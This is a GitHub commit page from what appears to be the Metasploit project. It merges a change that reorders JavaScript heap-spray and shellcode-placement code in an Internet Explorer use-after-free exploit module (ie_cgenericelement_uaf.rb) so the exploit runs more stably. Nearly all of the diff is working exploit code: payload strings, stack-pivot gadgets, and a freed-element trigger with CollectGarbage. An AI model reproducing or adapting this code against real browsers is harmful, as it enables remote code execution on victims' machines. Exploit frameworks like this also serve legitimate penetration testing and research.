Skip to content

Commit

Permalink
Land #1810, @wchen-r7's modification to make ie_cgenericelement_uaf m…
Browse files Browse the repository at this point in the history 
…ore stable
  • Loading branch information
jvazquez-r7 committed May 9, 2013
2 parents f9f769c + 9043eed commit 94f841d
Showing 1 changed file with 16 additions and 16 deletions.
32 changes: 16 additions & 16 deletions modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -227,6 +227,22 @@ def load_exploit_html(my_target, cli)
function helloWorld()
{
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
}
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");
magenta = unescape("#{align_esp}");
for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
else { magenta += unescape("#{align_esp}"); }
}
magenta += sparkle;
f0 = document.createElement('span');
document.body.appendChild(f0);
f1 = document.createElement('span');
Expand All @@ -246,22 +262,6 @@ def load_exploit_html(my_target, cli)
f1.innerHTML = "";
CollectGarbage();
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
}
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");
magenta = unescape("#{align_esp}");
for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
else { magenta += unescape("#{align_esp}"); }
}
magenta += sparkle;
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
}
Expand Down

0 comments on commit 94f841d

Please sign in to comment.